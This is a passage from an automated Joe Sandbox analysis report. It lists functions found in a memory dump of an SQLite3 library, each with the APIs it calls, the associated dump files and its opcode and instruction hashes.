                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID:
                                  • API String ID: 2585109301-0
                                  • Opcode ID: e2ea9d47cb9f36f6187c8d658b42c527170a30c89a9a46cd249742b1a3a99d88
                                  • Instruction ID: 3e2db8603e201e92329c8a6436e0daff0f8c6e5b559e240435b5c4289ae2c6ea
                                  • Opcode Fuzzy Hash: e2ea9d47cb9f36f6187c8d658b42c527170a30c89a9a46cd249742b1a3a99d88
                                  • Instruction Fuzzy Hash: 7FB115B5A05646CFDB10CF68C48579AB7F1BF89308F29C569E855AB309D770E812CFA0
                                  Function 61E8A080 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ee9632d98a62fd344a323c47bfe1b46c8eb4288ff0f245b17196c7b68786863
                                  • Instruction ID: 1c4fba5ad42c3705887d6482ae87875b737444aa9aba6907884cf7e47b6b682a
                                  • Opcode Fuzzy Hash: 4ee9632d98a62fd344a323c47bfe1b46c8eb4288ff0f245b17196c7b68786863
                                  • Instruction Fuzzy Hash: 1281E2B5A45A219FDB90DFA9C58064D7BF1BFC5354F28C869E848CB364E734E840CB52
                                  Function 61E38ABC Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mprintf.SQLITE3 ref: 61E38ADD
                                    • Part of subcall function 61E35932: sqlite3_initialize.SQLITE3 ref: 61E35938
                                    • Part of subcall function 61E35932: sqlite3_vmprintf.SQLITE3 ref: 61E35952
                                  • sqlite3_free.SQLITE3 ref: 61E38C1D
                                  • sqlite3_free.SQLITE3 ref: 61E38C25
                                    • Part of subcall function 61E35904: sqlite3_free.SQLITE3 ref: 61E35913
                                    • Part of subcall function 61E35904: sqlite3_vmprintf.SQLITE3 ref: 61E35925
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                  • String ID:
                                  • API String ID: 2044204354-0
                                  • Opcode ID: 3257d2304a51e70396e1be56956d5a857b2062ef6557ededf43c18dbae298c8d
                                  • Instruction ID: 57f307549e9d601d8810610c32baac455943f3e5b2bdc9dcc0553158b3545d59
                                  • Opcode Fuzzy Hash: 3257d2304a51e70396e1be56956d5a857b2062ef6557ededf43c18dbae298c8d
                                  • Instruction Fuzzy Hash: AD4104B4A09259DFCB04DFA9D480A9EBBF5AF88314F20CA2EE859D7340D734D802DB51
                                  Function 61E332B8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 335COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E32DB2: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?,61E332D3), ref: 61E32DE1
                                    • Part of subcall function 61E09235: memcmp.MSVCRT ref: 61E0928F
                                    • Part of subcall function 61E09235: memcmp.MSVCRT ref: 61E092F3
                                  • sqlite3_malloc64.SQLITE3 ref: 61E334D3
                                    • Part of subcall function 61E1A56D: sqlite3_initialize.SQLITE3 ref: 61E1A578
                                  • memcmp.MSVCRT ref: 61E33593
                                  • sqlite3_free.SQLITE3 ref: 61E33671
                                  • sqlite3_log.SQLITE3 ref: 61E33722
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                  • String ID:
                                  • API String ID: 885863977-3916222277
                                  • Opcode ID: dda9503678de94509c5c38f57b5ad9e5488ca0b0573e3c3a67e44570088a135d
                                  • Instruction ID: 3346f4716d74fb0cdd67f874f3c1e281c882292da2773af4ec15545e1d314216
                                  • Opcode Fuzzy Hash: dda9503678de94509c5c38f57b5ad9e5488ca0b0573e3c3a67e44570088a135d
                                  • Instruction Fuzzy Hash: 4EE113B0A042698FDB14CFA9C984B8DBBF1BF88308F218569D858EB355EB74D845CF40
                                  Function 61E2393B Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E2395D
                                  • sqlite3_value_text.SQLITE3 ref: 61E2396B
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E23978
                                  • sqlite3_value_text.SQLITE3 ref: 61E239A6
                                  • sqlite3_result_error.SQLITE3 ref: 61E239D0
                                  • sqlite3_result_int.SQLITE3 ref: 61E23A10
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                  • String ID:
                                  • API String ID: 4226599549-0
                                  • Opcode ID: f34950e5684de05c4a9c613b92284f6556da9bb16a9891f387af4bc58c7132b0
                                  • Instruction ID: ce9ac5e355f34b09ed8fa23b65482c80916be78f7215440a1a91a7115ab24374
                                  • Opcode Fuzzy Hash: f34950e5684de05c4a9c613b92284f6556da9bb16a9891f387af4bc58c7132b0
                                  • Instruction Fuzzy Hash: CE21F5B49046499BCB00DFA9C594A59BBF1AF89364F28C92DE8E89B391D734D841CF11
                                  Function 61E36ED9 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E36EF0
                                  • sqlite3_result_error.SQLITE3 ref: 61E36F1F
                                  • sqlite3_value_text.SQLITE3 ref: 61E36F34
                                  • sqlite3_load_extension.SQLITE3 ref: 61E36F4F
                                  • sqlite3_result_error.SQLITE3 ref: 61E36F6A
                                  • sqlite3_free.SQLITE3 ref: 61E36F75
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                  • String ID:
                                  • API String ID: 356667613-0
                                  • Opcode ID: ad0683b6295e250cb46dcb025d47c20a46f76eb2573b1f033c7a54ed45ce1532
                                  • Instruction ID: edf52a69823497749dee90875158762befd838aa40fbb6e8149444cc7cd020d5
                                  • Opcode Fuzzy Hash: ad0683b6295e250cb46dcb025d47c20a46f76eb2573b1f033c7a54ed45ce1532
                                  • Instruction Fuzzy Hash: C21126B49087569BCB00EF69C48465EFBF0AF88364F61CA2DE8A88B350D334D582CF51
                                  Function 61E37BB9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 155COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mprintf.SQLITE3 ref: 61E37D69
                                  • sqlite3_free.SQLITE3 ref: 61E37D95
                                    • Part of subcall function 61E37B5F: sqlite3_vmprintf.SQLITE3 ref: 61E37B78
                                    • Part of subcall function 61E37B5F: sqlite3_mprintf.SQLITE3 ref: 61E37B96
                                    • Part of subcall function 61E37B5F: sqlite3_free.SQLITE3 ref: 61E37BA2
                                    • Part of subcall function 61E37B5F: sqlite3_free.SQLITE3 ref: 61E37BAA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                  • String ID: AND$NOT$~a
                                  • API String ID: 966554101-3338164367
                                  • Opcode ID: 8457b840c5e30f2bcc46fc909dcb419386340dda47e2d6a82a0d99fc5ead30bf
                                  • Instruction ID: 0c423f2f4f220a55a9d1a73cc7ff7bfeee3a5b35033407a386e05654d73c6614
                                  • Opcode Fuzzy Hash: 8457b840c5e30f2bcc46fc909dcb419386340dda47e2d6a82a0d99fc5ead30bf
                                  • Instruction Fuzzy Hash: 695105B0A08762CFD7089FA5C58122EBAF6AFC9314F71C82DD59A97340D734D882CB52
                                  Function 61E2DC00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E2DC1C
                                  • sqlite3_value_text.SQLITE3 ref: 61E2DC29
                                  • sqlite3_value_text.SQLITE3 ref: 61E2DC37
                                  • sqlite3_result_text.SQLITE3 ref: 61E2DCD2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$sqlite3_result_text
                                  • String ID: i
                                  • API String ID: 380805339-3865851505
                                  • Opcode ID: 3f8c21a014e1d3191214186bdf6f9068606b952b5e1766168ea8120f87a1c318
                                  • Instruction ID: 9d9a3c4c9a607eb7f60e688532be97193aaec2ed4b7373994836bc1b93cf1d89
                                  • Opcode Fuzzy Hash: 3f8c21a014e1d3191214186bdf6f9068606b952b5e1766168ea8120f87a1c318
                                  • Instruction Fuzzy Hash: 0F41B2B9A046459BCB00DFA9D99069EBBF5BF88614F20C92EE8A8D7350E774D841CF41
                                  Function 61E0B8A6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_strglob
                                  • String ID: $
                                  • API String ID: 476814121-227171996
                                  • Opcode ID: b7f35c805358c5739c1b5e582caabc19c2a4dceb96950092a4ef3edac0a04fb5
                                  • Instruction ID: 52d53fc23315dfb26c0c94d4ab4e367c938fedb79b90a6d50123b424f2ba3027
                                  • Opcode Fuzzy Hash: b7f35c805358c5739c1b5e582caabc19c2a4dceb96950092a4ef3edac0a04fb5
                                  • Instruction Fuzzy Hash: 3D21273880838389DB118B7AC8C034AFEE4BF46319F78C46DC5959A6A1E330D551C752
                                  Function 61E1976C Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_free.SQLITE3 ref: 61E197C4
                                  • sqlite3_malloc.SQLITE3 ref: 61E1985A
                                  • sqlite3_free.SQLITE3 ref: 61E1978B
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_free.SQLITE3 ref: 61E199E9
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                  • String ID:
                                  • API String ID: 165182205-0
                                  • Opcode ID: 35961690698bec3b02c1477585319b43b194ea75ce560f06e5998328755cbec5
                                  • Instruction ID: b1ef7e8860b0ed4c9317605a847a43c6f525a1dbc4fc1a0efdd224f6ed557e22
                                  • Opcode Fuzzy Hash: 35961690698bec3b02c1477585319b43b194ea75ce560f06e5998328755cbec5
                                  • Instruction Fuzzy Hash: 3DA1B175D08259CBCB14CFA9D480ADDFBF1BF88314F25852AE859AB348E774A945CF80
                                  Function 61E053DB Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_strnicmp
                                  • String ID:
                                  • API String ID: 1961171630-0
                                  • Opcode ID: 9930e27b79f754936161969b3d2a0867470f4c6e3c4f318c034062284ae77bb8
                                  • Instruction ID: 12da7b59be2f03f68c1b708de1f6d14bb4f0c2de1b38390946f127f53e118ade
                                  • Opcode Fuzzy Hash: 9930e27b79f754936161969b3d2a0867470f4c6e3c4f318c034062284ae77bb8
                                  • Instruction Fuzzy Hash: 1F51276150974189E7204E94B8823E97FA39F4330FF79D84AC4A587392C27BC0BB8B53
                                  Function 61E5144A Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E516F5), ref: 61E51473
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E516F5), ref: 61E51600
                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E516F5), ref: 61E51612
                                  • sqlite3_free.SQLITE3 ref: 61E51629
                                  • sqlite3_free.SQLITE3 ref: 61E51631
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                  • String ID:
                                  • API String ID: 2921195555-0
                                  • Opcode ID: 31254bff72f6fa10f92931e263e11ff6af3a8aa7e10360f125ecaeba1497c9d7
                                  • Instruction ID: 82f435f554425c3e8259f5f38198153c6c986d6876c72bf9f9390af6ea1f9c48
                                  • Opcode Fuzzy Hash: 31254bff72f6fa10f92931e263e11ff6af3a8aa7e10360f125ecaeba1497c9d7
                                  • Instruction Fuzzy Hash: 43519E74A046428BDB50DFA9C8C064AB7B1BF84318F29C57CCC699F305D739E866CB91
                                  Function 61E36F82 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                  • String ID:
                                  • API String ID: 4073198082-0
                                  • Opcode ID: 5a29ff30149f8057225786bd77eed4391416a7d579fc6a7b6fb904446722af83
                                  • Instruction ID: 57fcdb8157e532e05b303cabae7a666bb47ce731d7bc4c790d45638caaf0613a
                                  • Opcode Fuzzy Hash: 5a29ff30149f8057225786bd77eed4391416a7d579fc6a7b6fb904446722af83
                                  • Instruction Fuzzy Hash: B84156B4A04265CFDB04CF68C48465ABBE1FF88314F28C868E8558F349E735E991CFA1
                                  Function 61E343AA Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_result_null.SQLITE3 ref: 61E343CC
                                  • sqlite3_result_int.SQLITE3 ref: 61E343EB
                                  • sqlite3_result_int64.SQLITE3 ref: 61E344A0
                                  • sqlite3_result_double.SQLITE3 ref: 61E344D4
                                  • sqlite3_malloc.SQLITE3 ref: 61E34511
                                  • sqlite3_result_text.SQLITE3 ref: 61E345BA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
